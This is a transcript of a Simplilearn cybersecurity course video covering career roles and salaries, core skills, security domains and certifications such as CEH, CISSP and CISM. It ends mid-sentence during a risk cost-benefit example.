Hi everyone, welcome to day 3 of the Cybersecurity Week by Simplilearn. On day 2, we looked at ethical hacking in detail. Today, we are going to focus on the fundamentals of cybersecurity. Cybersecurity is a fascinating branch of information technology. This field is highly lucrative. Cybersecurity involves techniques, various networks, data, and computer systems from unauthorized digital access. There are several ways to implement cybersecurity depending on the kind of network you are connected to and the type of cyber attacks you are prone to. So today, that is on day 3, we learn the different types of cyber attacks, the importance of cybersecurity, and what cybersecurity is all about. Following this, you will be briefed about the various cybersecurity certifications available today and the career prospect in this field. We will also look at the world-renowned CISSP certification. So let's continue our cybersecurity journey on day 3.
With the world turning virtual, cyber attacks are constantly flooding new headlines. COVID-19 accelerated the current digital transformation, and the year 2020 witnessed several data breaches. Since technology has become more intertwined with our daily lives, it is no surprise that the need for skilled cybersecurity professionals is increasing. On that note, hey everyone, welcome yet to another exciting video by Simplilearn, which will take you through the top cybersecurity career options available today. There is a significant lack of skilled cybersecurity professionals who can tackle the cybersecurity challenges faced daily. Hence, a career in cybersecurity is demanding and equally rewarding. Finding the right career path in the cybersecurity industry isn't always easy. Here, we are here to help you with that. There are a few prerequisites for a career in cybersecurity, the basic one being a bachelor's degree in a subject relating to cybersecurity. However, if you don't have a relevant degree, you can always take up relevant cybersecurity certifications and kickstart your cybersecurity journey. A few other skills like networking, knowledge of operating systems, and cloud security are required to start and grow your cybersecurity career. You can check out our video on the top 5 cybersecurity skills to know more. Cybersecurity jobs vary from entry-level to executive management and everything in between. There are several cybersecurity paths available today. It is best if you start with entry-level and then move on to the next level with the help of certifications and relevant experience. Here, let us have a look at the top 5 cybersecurity job roles today. The first job role is that of a network engineer. Network engineers construct and administer a company's computer networks. They are responsible for installing, configuring, and supporting network equipment. They also configure and maintain firewalls, switches, and routers. This entry-level cybersecurity job can help you start your journey to become an ethical hacker. The annual average salary of a network engineer in the US is $85,098, and in India, it is around 510,000 rupees. Second on our list is Information Security Analyst. As an Information Security Analyst, your primary duty is to protect sensitive information. Information Security Analysts create and implement plans for preventing cyber attacks. They monitor data access and ensure compliance with policies. Depending on the cyber threat, they decide if it has to be resolved or escalated further. In the US, an Information Security Analyst earns $89,140 annually. And in India, they earn 6,42,756 rupees. Third on our list is ethical hacker. They are also known as penetration testers. They are network security consultants who identify and exploit system vulnerabilities just like how a hacker would do. They probe and test the network using various penetration tools and software. They also design new penetration tools and document the test results. In the US, a certified ethical hacker earns around $93,000 on an annual average basis. And in India, they make around 5 lakh rupees. The fourth job role that we are going to talk about is security architect. Security architects research and plan the security elements for their organizations. They design robust security structures that are capable of preventing malware attacks. A security architect approves the installation of routers, VPN, and firewalls. Their duties go beyond just architecture building and including formulating company procedures, guidelines, and user guides. Security architects in the US make a handsome sum of $124,000 a year on an average, and in India, they make nearly 21,80,000 rupees. And finally, fifth on our list is Chief Information Security Officer, CISO. They are senior level officers in an organization. They ensure the safety of the information they develop, implement and maintain information security and risk management programs. They also interact with stakeholders and regularly brief them with information security concerns. The average annual salary of a Chief Information Security Officer in the States is a whopping $165,000 annually, and in India it is 22,22,845 rupees. Several companies are looking for skilled cybersecurity professionals. Philips, Siemens, Google, Microsoft, and GE, to name a few. With passion, the right amount of experience, and relevant certifications, you can grow your cybersecurity career. You can check out Simplilearn Cybersecurity Expert Master's Program to equip you with the necessary skills needed to become an expert in this rapidly growing domain. This course will help you learn various methods as to how you can protect your infrastructure, secure your data, run risk analysis, achieve compliance, and much more.
In today's world, data is generated and exchanged at a high speed. Did you know that 2.5 quintillion bytes of data are generated every day? Companies all over the world make crucial decisions by analyzing all of this data. With the rise of data, there has been a tremendous increase in the number of cybercrimes across the globe. To prevent cyberattacks, cybersecurity is implemented. So what is cybersecurity? It is nothing but the practice of protecting networks, programs, computer systems, and their components from unauthorized digital access. As mentioned earlier, companies rely on data, and it is required that the data is not compromised or stolen. To do this job, we have various cybersecurity professionals who are skilled to protect data from cyber attacks. There has been a sky-high growth in the number of cybersecurity jobs. This growth will only double in the near future, as companies will always be on the lookout for skilled professionals who can protect the confidentiality of the data. So now that we know why cybersecurity jobs are important, let us have a look at the various cybersecurity job roles. There are various kinds of cybersecurity job roles. Let's go through few of the top paying job roles. Going in the descending order of the salary structures in the USA, we first have the Chief Information Security Officer job role, followed by the Security Architect, Penetration Tester. Then we have Cybersecurity Engineer, Malware Analyst, and finally we will look into the Computer Forensic Analyst job role. I will now brief you about each of these job roles individually and look into their responsibilities, skills, and salary structures both in the USA and in India. So let's start off with Chief Information Security Officer. A CISO is a senior level officer in any organization. He is entrusted with the safety of the data in an organization. A CISO has various responsibilities. They are required to develop, implement, and maintain an organization's security and risk management program. They also communicate with their organization's stakeholders and brief them about various information-related security concerns. By doing so, they are able to implement a better security system for an organization. At times, a CISO would have to also recruit an IT team's members. They need to make sure that the candidate is knowledgeable and skilled. A company's risk and vulnerabilities have to be predicted beforehand. Prediction of such risks and vulnerabilities are taken care of by a CISO. They play a major role in preventing cyber attacks in any organization. Let's now look at the different skills required to be a Chief Information Security Officer. First and foremost, a candidate must have good communication and presentation skills. This is very important for any organization. A degree in computer science along with an MBA is a preferred qualification. MBA is not mandatory, but there is an added advantage if the candidate has an MBA along with a computer science degree. The candidate must be good at handling security breaches. It is preferred that the candidate has prior experience of handling a security breach and who is also good with incident management. Many employers prefer candidates who have global certifications. To become a Chief Information Security Officer, the preferred certifications are CISM, that is Certified Information Security Manager, and Certified Information System Security Professional, CISSP. If a candidate has either of these certifications, they have a better chance of getting a job as a Chief Information Security Officer. Let's now move on to their salary structures. A CISO earns nearly $180,000 in the USA. In India, the salary is nearly 25 lakhs per annum. That's a lot of money. So these were the responsibilities, skills, and the salary structure of a Chief Information Security Officer. Let's move on to our next role. Our next role is that of a security architect. A security architect maintains the security of an organization's computer systems. They prevent the computer systems from malware attacks. Let's look into their responsibilities. First and foremost, our security architect identifies weak spots in a system by performing vulnerability tests. These tests are carried out on a regular basis. Along with vulnerability tests, risk analysis and security assessments are also done by a security architect. Installation of routers, VPN and firewalls are approved by a security architect. These devices are very important when it comes to the security of an information system. Well, a security architect rightly approves the installation of these devices. Digital signatures and public key infrastructures are designed. In addition to all the above responsibilities, a security architect also provides technical assistance and guidance to the other security team members. Let's now move on to the skills required to be a security architect. First and foremost, the candidate must have a computer science or an information technology degree. Coming to the experience, the candidate must have an experience in the field of risk management, as the role of a security architect is a lot to do with managing risks. Understanding of the network basics and various security protocols along with cryptography is required to be a good security architect. Lastly, the preferred certification to become a security architect is that of a CISSP, which is Certified Information System Security Professional. As mentioned earlier, this is only a preferred certification. A candidate who has this certification has a higher chance of bagging a security architect job. Let's now look into the different salary structures in the USA and in India. In the USA, a security architect earns nearly $123,000 per annum. In India, a security architect earns nearly 20 lakhs per annum. So that's all about security architect. Let's now move on to our next role, that is penetration tester. A penetration tester, also known as an ethical hacker, is a cybersecurity professional who tries to exploit a security system's vulnerabilities just like how a hacker would do. A penetration tester mimics the role of a hacker. Let's look into the various responsibilities of a penetration tester. As the name suggests, a penetration tester needs to perform penetration tests to discover and identify vulnerabilities in a system. In addition to this, they are also responsible for designing new penetration tools. All the penetration tests results are documented, and based on the document, new security measures are discussed with the other IT team and the management. A penetration tester performs tests by developing codes, and they also conduct security audits which help them understand the vulnerabilities in a system. Let's now look into the different skills required to be a penetration tester. A candidate must have 1 to 4 years of experience in the information security field. Knowledge of Windows, Linux, Unix operating systems is required. Also, the candidate must know C and C++. Languages such as Java, PHP, and Perl are preferred by employers, but not a requirement. To successfully bag the position of a penetration tester, the preferred certifications are Certified Ethical Hacker, that is CEH, and Certified Expert Penetration Tester, that is CEPT. Let's look into the salary structures of a penetration tester. In the USA, a penetration tester earns nearly $117,000 per annum. And in India, a penetration tester makes nearly 4 lakh rupees per annum. So those were the responsibilities, skills, and salary structures of a penetration tester. Let's now move on to our next job role, that is cybersecurity engineer. On the whole, a cybersecurity engineer protects an organization's network and its data. They also plan security measures to prevent an organization from cyberattack. Let's look into the responsibilities of a cybersecurity engineer. They design cybersecurity platforms for a company. They are also responsible for planning and implementing cybersecurity measures. Well, a cybersecurity engineer solely designs, plans, maintains, and implements security measures in an organization. They're also required to report and communicate with the other teams in an organization. A cybersecurity engineer is different from a network security engineer. While a network security engineer looks into the troubleshooting, a cybersecurity engineer looks into the prevention of cyber attacks. Let's look into the skills required to become a cybersecurity engineer. Just like the other job profiles, a degree in computer science or information technology is a must. Well, 2 years of experience in the relevant field is required to become a cybersecurity engineer. A cybersecurity engineer is needed to design security systems. Hence, a candidate with a good problem-solving skill is required. Along with good problem-solving skills, the candidate must also be good with networking skills. As mentioned earlier, knowledge of C and C++ is a must. Java and Python knowledge is preferred to be a cybersecurity engineer. Moving on to the salary, a cybersecurity engineer earns nearly $96,000 in the USA. Whereas in India, a cybersecurity engineer earns nearly 7 lakh rupees per annum. Moving on to our next job role, that is malware analyst. As the name suggests, a malware analyst is one who identifies various cyber threats such as worms, viruses, trojans, bots to understand their nature. A malware analyst is skilled at analyzing the different malware threats in a system. Let's now look into a malware analyst's responsibilities. They are responsible to identify threats, and once they identify, they are supposed to document the methods to avoid such malware threats. They also research and develop malware protection tools. Various malware protection tools are developed by malware analysts so that the next time a cyber threat occurs, they are able to easily identify. In addition to the above responsibilities, a malware analyst is also responsible to constantly be updated with the new malware threats. Moving to the skills required, a candidate must know Windows, Linux, Unix operating systems, and knowledge of C and C++ is a must. Usage of tools like IDA, Pro, OliDBG, RegShot, and TCP View is suggested. Having a GIAC reverse engineering malware certification is a plus point. The certification is only a preferred certification. It is not a must that the candidate must possess this certification. Moving on to the salary structure, a malware analyst earns nearly $80,000 in the USA and earns nearly rupees 6 lakhs per annum in India. So those were the skills, responsibilities, and salary structure of a malware analyst. Let's move on to our last job role, that is computer forensic analyst. Previously, we have seen the job roles wherein they try to protect a company from a cyber attack. In this role, we will see how a computer forensic analyst works after a cyber attack. A computer forensic analyst works on cases following an attack. They collect digital evidences to retrieve information. Let's look into their responsibilities. With the help of various investigation tools, a computer forensic analyst gathers evidences from a system which was a victim of a cyber attack. Their main responsibility lies in recovering deleted, manipulated, or stolen data. A computer forensic analyst helps various officials in investigating a case by discovering evidences from data which was manipulated or compromised. There have been a lot of cases where a computer forensic analyst has come to the rescue of the police department. Moving on to the skills, the candidate must hold a bachelor's degree and work experience in the related field is required. For the post of a computer forensic analyst, it is not necessary that the candidate must hold a computer science degree, but the candidate must have relevant work experience. A candidate must have knowledge of networking, law, and criminal investigation, as they have to do a lot with investigating cases as well. A sound analytical mind is critical as they have to analyze data and arrive at conclusions as to identify the cybercriminals. The preferred certifications to become a computer forensic analyst are Certified Forensic Computer Examiner, that is CFCE, and Certified Computer Examiner, that is CCE. Well, these were the skill sets required to become a computer forensic analyst. Moving on to the salary structures. A computer forensic analyst earns nearly $71,000 in the USA. And in India, a computer forensic analyst earns nearly 8 lakh rupees per annum. That was all about computer forensic analyst. Well, those were the 6 top paid jobs in the field of cybersecurity. Now, I will run you through a sample resume of a cybersecurity engineer. This is only a sample resume of a cybersecurity engineer. You can alter it according to your own preference. Here, we first start off with the name and your email ID and phone number, then a quick summary about yourself and what you're good at and what you are looking for in an organization. After which you can give your LinkedIn profile link and your GitHub profile link if you have one. Moving on to the experience, here you would have to give the company's name and the tenure. Ideally for a cybersecurity engineer, the minimum number of years required is 2. And below that, you can write the different responsibilities that were taken care by you in your previous organization. TCP/IP network administration and security monitoring are 2 important responsibilities that any cybersecurity engineer must have on their resume. It is great if you have configured firewalls and IDs as well. Underneath that, you can mention the education, and it is required that you have a degree in computer science or in information technology. You can then mention your university and your GPA. Moving on to the skills. We have technical skills and non-technical skills here. Under technical skills, you would have to write the languages that are known to you. For example, C, C++, which is a must. Java and Python are preferred too. Knowledge of Windows, Linux, and Unix operating systems will also have to be on your resume if you're applying for a post of a cybersecurity engineer. The other skills depend from person to person. Here I have IDS and IPS penetration vulnerability testing, encryption technologies, knowledge of SQL, and at the end you can also write the certifications. Ideally, a cybersecurity engineer must have CCNA, CCNP certifications. In addition to it, even a CompTIA Plus certification is preferred. Moving on to the non-technical skills, here you can mention the languages that you're good at, the different competitions that you have participated in. It can also have your co-curricular activities, and anything to do with problem solving would also be an added advantage. With businesses moving online and shifting to cloud storage, currently the demand for cybersecurity is at its peak. With that comes a high demand for cybersecurity experts who can safeguard digital data. According to Cybercrime magazine by Cybersecurity Ventures, globally there would be nearly 3.5 million unfilled cybersecurity jobs by 2021, and the number of internet users will hit a whopping 6 billion by 2022. These numbers speak volumes, and this shows the growing demand for cybersecurity professionals across the globe. Now that you know the high demand for cybersecurity professionals, let us help you start your cybersecurity career by bagging the right skill set. Many of you out there might be waiting to become a cybersecurity professional but are unsure of how to go about it and what skills you would need to get a cybersecurity job. Not to worry, we are here to help you with that. After extensive research, we have come up with the top 5 skills that will help you get into the field of cybersecurity. Let's have a look at these skills individually. First, we have networking and system administration. The number 1 skill you need to have to enter the field of cybersecurity is computer networking. Networking is the backbone of the internet. It is imperative that you have an in-depth understanding of networking to start a career in cybersecurity. A network is a group of interconnected devices, and networking is the art of understanding how data is sent, transmitted, and received amongst these devices. You need to know various routing protocols. The TCP/IP and OSI models govern networking. The OSI model is comparatively newer. Basically, in these models, all the protocols are grouped into layers and work together to help you receive data on your device sent from a server. Learning networking will help you understand the technical aspects of data transmission, which will help you secure your data. You can take up networking certifications like Security Plus and Cisco CCNA to gain a strong networking foundation. Another skill that will be beneficial for you is to master system administration. If you think about it, all of us are sysadmins at some level. System administration is all about configuring and maintaining computers. You must be curious to know every aspect of your computer features and settings and play around a bit. Carry out a trial and error method and give yourself small tasks like recovering deleted files or monitoring old viruses on a VM. Explore new techniques, put them into use, and expand your knowledge. Let us now move on to our second skill, knowledge of operating systems and virtual machines. To become a cybersecurity professional, you need to have a strong knowledge of operating environments such as Windows, Linux, and Mac OS. Cybersecurity professionals largely use Linux, and it comes with several tools. To learn operating systems, go ahead and set up and use virtual machines, that is VMs, and play around with them. This will help you gain hands-on experience. As a cybersecurity expert, you should be comfortable working on any OS. VMs allow you to train and research in an isolated environment and help you maximize your skills. The next point to remember is to know Kali Linux. It is the most widely known Linux distribution for ethical hacking and penetration testing. It comes with several hundred tools related to penetration testing, malware analysis, security research, computer forensics, and so on. Kali contains several projects and you can learn a lot. Another good thing about Kali is that it is free to use. So what are you waiting for? Download and start right away. Remember that Linux is the backbone of cybersecurity and a commonly asked topic for cybersecurity interviews, especially for pen testing roles. Moving on to our third skill. Our third skill is network security control. It is another basic skill that every cybersecurity professional should have. Network security control refers to the different measures which are employed to enhance the security of a network. It is simple. You can only safeguard your network if you know how it works, how routers, firewalls, and other devices work. A firewall is a hardware or software that blocks incoming or outgoing traffic from the internet to your computer. Firewalls are required to secure a network. As a cybersecurity expert, you must be able to leverage a firewall to filter and prevent unauthorized traffic onto the network. In addition to that, as a cybersecurity expert, you must know about intrusion detection systems, intrusion prevention systems, virtual private networks, and remote access. An intrusion detection system, IDS, is designed to detect unauthorized access to a system. It is used together with a firewall and a router. You should be able to operate the IDS and recognize any security policy violations and malicious traffic on the network. As many of you may have used, a VPN is a connection between a VPN server and a VPN client. It is a secure tunnel across the internet. Moving on, next up we have an interesting skill. Any idea what that is? If yes, pause and leave a comment as to what you think the next skill will be.
If getting your learning started is half the battle, what if you could do that for free? Visit SkillUp by Simplilearn. Click on the link in the description to know more.
And before we jump into this skill, if you find this video interesting, make sure to give it a thumbs up. Fourth skill on our list is coding. So you might be wondering if coding is really required to become a cybersecurity professional. Well, it is true that not all cybersecurity professionals have or need coding skills. However, having zero coding knowledge may limit your opportunities in the future. Knowing a couple of programming languages will help you identify the plan behind deadly hacking techniques. So as seen on your screens, these are the best programming languages to learn to make your cybersecurity career worthwhile. We have C and C++. The C programming language is the backbone of most operating systems. C and C++ are low-level programming languages that you need to know as a cybersecurity professional. On the other hand, Python is a high-level programming language that is becoming popular among cybersecurity experts today. Knowing Python will give you an upper hand in your career. It will help you identify and fix vulnerabilities. JavaScript is another high-level programming language that adds interactivity to web pages. A good advantage of knowing JavaScript is that you can prevent cross-site scripting attacks from occurring. As in these attacks, the attacker implants malicious code in a web application. Speaking of PHP, because most of the websites are created using PHP, learning it will help you defend against intruders. Similarly, HTML is another language cybersecurity professionals should understand as most websites use it, and it is one of the easiest languages to learn. Another programming language that you can use is Golang. It is great for cryptography. You can solve various cybersecurity problems with it. Then we have SQL, that is Structured Query Language. Attackers use this language to damage the stored data. One such example is the SQL injection attack. Hence, having a good understanding of SQL will be highly beneficial. Another point we'd like to highlight is to have knowledge of assembly language. This will help you become a cybersecurity engineer. Assembly will help you understand how malware functions and thereby help you defend against it. In the cybersecurity domain, you can't just lock into a single language, and hence it is advised that you're acquainted with a couple of them. You can also do a crash course for these languages and learn them. Hence, determine the best programming language for your cybersecurity role and get familiar with the basics. Moving on, our fifth skill on the list is cloud security. There is a growing demand for cybersecurity professionals with cloud security skills in the coming years. Companies are on the lookout for professionals with security skills applicable to public and hybrid cloud platforms such as Amazon Web Services and Azure. More organizations look to cloud infrastructure to store data and run applications. This includes the implementation of policies and technologies that protect cloud-based systems and devices. Just like application development security, cloud security also involves building secure systems from the start. Companies want professionals who can manage the cloud security tools to identify and prevent any cloud breaches. People with experience and knowledge in managing big platforms such as Microsoft, Azure, AWS, and the GCP are in high demand. Now that we have seen the top 5 cybersecurity skills, let us go through a set of additional skills that can help you get into the cybersecurity field. Remember that to become a successful cybersecurity expert, you must possess a rich and diverse skill set. So in our list of additional skills, first we have risk analysis. Identifying risks even before their arrival is a great skill. Cybersecurity professionals are required to identify, manage, and mitigate risks. Risk management and mitigation is a skill set that is going to be highly in demand in the coming years. Next, we have information security. Companies require skilled professionals who can protect their electronic data from unauthorized access. Here, in-demand skills are authentication, authorization, malware analysis, and data recovery. Next on our list is security incident handling and response. As a cybersecurity expert, you must be prepared to handle any forthcoming threat of violating an organization's security policy. By following an updated incident response plan, your team can proactively protect your data and minimize the damages. In security incident management, you are required to identify, manage, record, and analyze security threats in real time. A security incident can be an active threat or a successful compromise of data or an attempted intrusion. It can also be incidents like DDoS attacks, phishing, APTs, ransomware, and many more. Another important pointer is that as a security practitioner, you must also manage and analyze the security information and event management, SIEM tools and services. Moving on, we have security audit. Security auditing is an internal check that is carried out to find flaws in the organization's information system. You must be able to conduct a review of the organization's adherence to regulatory guidelines. Security audit and compliance knowledge are very crucial as any missed area of regulatory compliance could lead to hefty penalties. Soon, organizations will need people who are more familiar with the various data privacy regulations. If you are good at paperwork, you can capitalize on this skill. Companies will need people who can understand what paperwork to file and which security protocols to use to comply with the regulations. Finally, we have laws and regulations, an often overlooked cybersecurity aspect. There are several cybersecurity laws and regulations, and if you break these laws intentionally or not, it doesn't matter as you will still be charged. These laws define how you can use the internet, and it also defines how people can be protected from becoming the victims of cybercrimes. Knowing these laws and regulations and following the best practice will make you ethical at your job, and this will in turn be good for your organization. So those were our list of additional skills. Apart from these, make sure you stay updated with new hacks and learn new tools as cybersecurity is ever evolving. Another important skill apart from these technical skills is your soft skills. Having a set of good soft skills will help you bag your dream job. We have a video on the top 5 soft skills that will help you grow in your career. Do watch that and incorporate those skills as well.
Let's start off with the educational qualifications first. So, as far as educational qualification is concerned, having a graduate degree in computer science or IT security or related field is a given. Having a master's program or a master's degree is an added advantage. There are a lot of universities out there in today's world that offer both bachelor's and master's degrees in cybersecurity or various computer fields. You might want to look them up before you decide which university you want to go with. There are private institutes like EC Council, SANS, or CompTIA that offer these kind of programs as well. The costs vary. Some of them are correspondence, some of them are physical in nature. So let's talk about the skills that you require to become a cybersecurity expert or an engineer. These are your baseline skills. It will be very important that you have some of the knowledge out of all of these tasks. It may not be necessary that you have everything at the start itself, but it will help you if you start building on these technologies before you start looking at advanced certifications. So you need to have solid ground in IT fundamentals, which means that you need to understand computers, you need to understand how they function, the components of a computer, maybe what's a processor, what is a cache, basically understanding the hardware part of it, right? Then solid ground in networking fundamentals. Hackers normally target the network. You want to hack over the internet, you want to hack over the intranet. There are a lot of protocols that are required and are utilized for data to be transmitted from one point to another. There are a lot of routing protocols of how a data packet can be converted from an internal IP address to an external IP address, how that packet is going to take a path to the endpoint and how is it going to travel back to your machine, and how your machine and the endpoint machine are going to interact with each other. So having a good understanding of networking and how computers function over the intranet and the internet is a very much required knowledge base. Coding skills. Now, as far as coding is concerned, we are not going to develop applications over here, but some scripting skills would be necessary, especially if you're going into network security and host-based security. For example, you want to write your own exploit in various tools like Metasploit, so you might want to learn languages like Ruby. However, if you're going to go into application security, then knowing Java, knowing C++, those kind of languages is a must. You may not be able to write complex programs, but you need to understand how those functions are being called. You need to know standard secure coding practices that need to be utilized for an application to be secure. Then understanding the architecture of an operating system. It is imperative that we know how operating systems function, and not function from a usability perspective, but from a troubleshooting perspective. We need to understand if there is an error on the operating system, how do we troubleshoot that? We need to understand how processes work in the background, how memory mapping works in the background, what web application pools are being utilized, and the various protocols that are being consumed by the operating system. Now, cloud security is a very niche skill in today's world, but cloud, as we all know, is here to stay, and most of the organizations that you'll deal with will either have a private cloud, a public cloud, or a hybrid cloud. So it is imperative that you upskill yourself, understanding how cloud technologies work, how they can be integrated in your day-to-day infrastructure, and how you can secure a cloud. Now, this doesn't become a baseline requirement. Obviously, you'll need to grow and you'll need to build based on the expertise that you have. But over a period of time, it would benefit you to have cloud security knowledge. And then malware analysis and reversing. When we're talking about cybersecurity, one of the most common attacks that we'll see would be from a virus or a Trojan. So understanding how these softwares work, how to identify them, how to troubleshoot them, how to reverse engineer them, and analyze these malwares becomes important. Again, this may not be a baseline requirement, but you need to hone on your skills on understanding malwares and reverse engineering them, especially if you're going into a malware analysis kind of a role. Let's start with the domains in cybersecurity. Let's understand what kind of domains are available and how we can map them as we go ahead with certifications and our job roles. So starting with the domains in cybersecurity, there is access control systems and methodologies, telecommunications and network security, security management and practices. Access control systems and methodologies would talk about identity and access management, single sign-ons, federation. So basically designing access controls, identifying the people who are trying to log in, authenticating them, and then authorizing them to access some resources that are there in your organization. So we're basically talking about the IEEE standards over here: identification, authorization, authentication, and accountability. Then there's telecommunications and network security. So you start up here with certifications like CCNA, CCNP, where you're talking about communications and protocols that work on the intranet and the internet. So how to secure these protocols, how to deploy these protocols to start off with, how to configure switches, routers, and how to secure them so that data leakages or attacks on your networks can be minimized. Then we have security management practices, which basically deal with disaster recovery and business continuity planning. So here you're planning about system failures because of various attacks like a distributed denial of service or a virus or a ransomware attack, or even environmental attacks like natural disasters like fires or flooding, and man-made disasters where people cannot show up to work, and you have to ensure that your business continuity is not affected because any of these factors. Security architectures and models. So this domain focuses mostly on having security policies and procedures. So here you're more on a managerial perspective where you're creating policies to be implemented in your organizations. Policies are nothing but high-level standards which you need to implement. For example, what level of encryption you want. Do you want to use a policy would include things like data classification. So you're identifying data and you're classifying them based on the sensitivity of that data towards your organization. For example, some of that data could be classified, some of them could be secret, top secret, and some data could be unclassified. So these policies help you identify and decide how you're going to treat security in your organization. Then we have law investigation and ethics. So this domain can be mapped with the forensic investigations. So for example, a crime has happened, somebody has got compromised, some data has been compromised. You as a forensic investigator come in and try to analyze what went wrong. You try to analyze what has been affected, to what extent has been affected, how did the attack happen. Then application and system development security. Now this is where you're talking about application security. So let's say you go into a software development lifecycle, you're developing an application and you want to treat that application with security in mind. So your OWASP top 10 open web application security project comes in. You look at the top 10 risks like injection attacks, maybe cross-site scripting, cross-site request forgery, and you try to mitigate these attacks by following secure coding practices, testing the application from a security perspective, and ensuring that your coding is strong enough to withstand such attacks. Cryptography. So this is where you go into the encryption phase, where you are going to try to create solutions on which kind of encryptions you want to utilize to protect which kind of data. If you remember earlier on, we talked about policies where we did data classification, where some data is sensitive, some data is classified, top secret, and those different various classifications. Now, to keep costs at bay, you cannot use the same encryption across, because what you're using for confidential information or secret information would be a very high level encryption, which would cost you a lot of money to implement. So in cryptography, it's basically you becoming an expert in understanding which kind of encryption standards you want to implement on what kind of data, or what kind of solutions you want to integrate on an organizational level. So here you'll be looking at data in use, when data is being consumed by a user, data in motion when it's being transmitted, for example the HTTPS connection that we have with websites, or data in rest when data is being stored onto a stationary hard disk and you want to encrypt that. Then you have the computer operations security. So this would be covering your day-to-day security operations. So something that we call a SOC, a security operations center, where you're going to look at all the various incidents that happen on a regular basis. You're going to investigate those incidents and you're going to see if they're going to affect your organization's security in any which manner, and then trying to come up with a solution to prevent that from happening. And the final part is physical security. Now this does look like it may not cover IT security, but it does. For example, your doors that you're going to place to sensitive areas, for example a server room. You do not want anyone and everyone access to that server room. So what kind of security are you going to use to secure that server room? For example, CCTV cameras or biometrics on your doors. So what kind of doors do you want there in the first place? Do you want to keep security guards over there and they are going to frisk people to see if they are carrying anything that can be used to manipulate the security of the servers? Moving on from the domains, let's start with the foundational cybersecurity courses. Now the first 4 that are populating the screen: CEH, Security Plus, Certified Network Defender, and the Forensic Investigator. Now they are mapped as foundational cybersecurity courses, but in their own right they are still advanced courses, because if you see, they do assume that you have some knowledge on scripting, you may have some basic knowledge on operating systems, but you are technically adept at analyzing problems. So they do assume a little bit of knowledge from your side. If you're a fresher, you want to hone up a little bit on your networking skills, you want to hone up a little bit on how operating systems work and how their processes work, and then you want to attempt these certifications. The first one being Certified Network Defender. Now this is a certificate that talks about network security. CEH on the other hand talks about an ethical hacker from an offensive security perspective, where you're doing a penetration test and you're going to try to leverage attacks against an organization to analyze how their security is. CompTIA Security Plus also is on the same lines of CEH. CEH is offered by an organization called EC Council. The competitor to them is CompTIA. Both of them are globally accepted certifications, widely accepted across the Americas, Europe, and Asia. The CHFI, which is the Computer Hacking Forensic Investigator certification, is basically the niche certification for forensic investigators. You can directly attempt the CHFI, but if you don't know how hackers work, it may defeat some of the purpose. So it would help to first go for the CEH or the Security Plus and then the Forensic Investigator certification. Let's look at a brief overview on each of these. To start off with the CEH, it is going to train you in reverse engineering. So this is where penetration testers come in, and the word ethical hackers. Hackers are basically people who try to get unauthorized access to various resources. Ethical hacker is where you're going to emulate or simulate those attacks with an authorization from the organization, so you still keep it legal. The aim is to find out various flaws in the current deployment of security controls and then try to figure out how you can plug those flaws and increase or improve on the security posture. So it's CEH and CompTIA Security Plus are about the same. It's just the difference of the certification body, but both of these are widely accepted and globally accepted as well. Then we have the Certified Network Defender, covers protection, identification, and response on how we approach network security. So this is the certification that is going to explain you certain protocols. We're going to talk about switches, routers, various technologies of LAN, WAN, MAN, and we're going to talk about how we can secure networks on an organizational perspective. The Forensic Investigator certification, as we've discussed, is in the domain of law, investigation, and ethics. It talks more about analyzing how the attack happened, what was affected, what was compromised, to what extent, and then we are trying to reverse engineer and try to identify the culprit of who attacked that organization. After the foundational, we are going to look at the managerial cybersecurity courses. Now here you are either a cybersecurity manager or you're looking at a lead kind of a scenario where you are responsible to manage the team who's going to implement security in your organization. The difference here is the previous courses are very technical in nature, very hands-on in nature, and you are the person who's going to be responsible to implement that security control or test that security control. Here, in managerial cybersecurity courses, you're not going to be technical hands-on, but you're going to be more on the policy side of things. So start off with COBIT. COBIT talks about control objectives for information and related technologies. Now this is an advanced kind of a certification. Then we have CISSP. Some people call it CISM as well. It's a Certified Information Security Manager certification. Then we have CISA or CISA, Certified Information Systems Auditor. And then we have the CRISC, which is a Certified in Risk and Information Systems Control. So as you can see, just from the names, nothing hands-on, no penetration testing, no vulnerability assessments, no implementation of tools, but you're going to have a holistic view of how vulnerabilities and threats are going to affect the organization, and you will be responsible to manage and guide the team on what to be implemented and what to be consumed. So you will be managing teams, technical teams, on how to implement security and how to analyze that security. You'll try to make sense of data that has been provided to you and utilize that data to make business sense. So what is COBIT? It gives you a deep understanding of the framework for managing and governing enterprise IT environments. So it's all about the environment. Now you're in an enterprise organization. This is a standard, so it gives you a basic framework of how you want to implement security from an end-to-end perspective. You're going to talk about IT governance here. You're going to deal with a lot of stakeholders over here. You're going to get a lot of various inputs and you're going to analyze that information and you're going to implement the framework based on the analysis that you have done. People with COBIT certifications and who've been hired as managers would normally have around 8-9 years of experience, and only then would they be put in such a position. CISM, the Security Manager certification. It is a key certification for information security professionals who manage, design, oversee, and assess enterprise information security. So this is more from a project management perspective, but projects regarding security. So it is a semi-technical certification. It is necessary that you understand the technical terms of hacking or ethical hacking. You have a basic understanding of what kind of risks or attacks are present in a cybersecurity enterprise, and then you're going to manage the project and try to implement security and analyze that security to see everything meets standards. So as far as the security manager is concerned, since we're talking about a manager portfolio, you obviously will have to have some experience before you get these kind of job roles. Then comes the CISA or the CISA, the systems auditor. It will give you the skill sets to govern and control enterprise IT and perform an effective security audit on any organization. So this is more of a system auditor's profile, where you're going to talk about overall functioning of IT infrastructure in an organization. You're going to audit that infrastructure to ensure that it meets standards, and you're going to look at the risks that that are going to affect this infrastructure. You're going to do a risk management exercise, and then you're going to come up with security controls on how to minimize or mitigate these risks. The CRISC, there's another risk management certification, but it is widely accepted and it has a lot of value globally. This course will enable you to design, implement, monitor, and maintain information security controls for enterprises. Now, this certification only deals with risk management. So it has a complete strategy that evolves and revolves around risk identification, assessment, response, and control monitoring. So the major job position that you're going to have is in an IT infrastructure, identifying the risks or identifying the security risks that the organization is going to face. You're going to assess them, so a business impact analysis. If that risk comes true, how is it going to affect the business, not only from a technical perspective but from a monetary perspective as well. And then you're going to do a cost benefit analysis for a security control. For example, I figured out that a web application has a SQL injection attack vulnerability. If the assessment proves that if this becomes real, or if this is realized by a hacker, we would be looking at a potential loss of $1 million, and we'll have to report it to the regulatory authority, which would then lead to further fines. So here, then we're going to figure out a response to this threat, where let's say we identify a web application firewall, and an implementation of that firewall will minimize the risk. At the same time, a developer would come into the picture and say we can redevelop the application or that part of the application where the vulnerability exists, and we can ensure that the application is secure. Now, when you do a cost benefit analysis, you figure out that for the recoding of that part of that application would take at least 6 months and is going to cost us a lot of money. Whereas if we implement a web application firewall, it will just cost us around $50,000 and we would still minimize $1 million risk. Now here, it is the 